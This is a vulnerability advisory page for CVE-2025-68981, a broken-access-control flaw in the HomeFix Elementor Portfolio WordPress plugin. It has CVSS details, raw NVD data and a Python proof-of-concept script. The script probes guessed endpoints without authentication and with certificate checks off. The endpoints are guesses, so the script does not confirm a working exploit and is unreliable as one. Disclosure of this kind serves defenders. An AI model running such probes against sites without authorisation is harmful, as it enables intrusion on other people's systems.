Security Vulnerability Report
中文
CVE-2025-68981 CVSS 5.3 MEDIUM

CVE-2025-68981

Published: 2025-12-30 11:15:57
Last Modified: 2026-04-27 19:16:39

Description

Missing Authorization vulnerability in designthemes HomeFix Elementor Portfolio homefix-ele-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HomeFix Elementor Portfolio: from n/a through <= 1.0.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HomeFix Elementor Portfolio <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68981 PoC - HomeFix Elementor Portfolio Broken Access Control # This PoC demonstrates accessing protected functionality without authentication import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68981 """ print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68981: Missing Authorization in HomeFix Elementor Portfolio") # Common WordPress plugin paths for homefix-ele-portfolio potential_endpoints = [ f"{target_url}/wp-json/wp/v2/settings", f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/homefix/v1/portfolio", f"{target_url}/?rest_route=/homefix/v1/portfolio" ] for endpoint in potential_endpoints: try: print(f"\n[*] Testing endpoint: {endpoint}") # Test without authentication headers headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester/1.0', 'Content-Type': 'application/json' } response = requests.get(endpoint, headers=headers, timeout=10, verify=False) print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print(f"[!] Potential vulnerability detected - endpoint accessible without auth") print(f"[+] Response preview: {response.text[:200]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint properly protected (status: {response.status_code})") else: print(f"[-] Unexpected status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {str(e)}") print("\n[*] Manual testing recommended - check plugin-specific endpoints") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68981-poc.py <target_url>") print("Example: python cve-2025-68981-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68981", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:56.737", "lastModified": "2026-04-27T19:16:39.203", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in designthemes HomeFix Elementor Portfolio homefix-ele-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HomeFix Elementor Portfolio: from n/a through <= 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/homefix-ele-portfolio/vulnerability/wordpress-homefix-elementor-portfolio-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}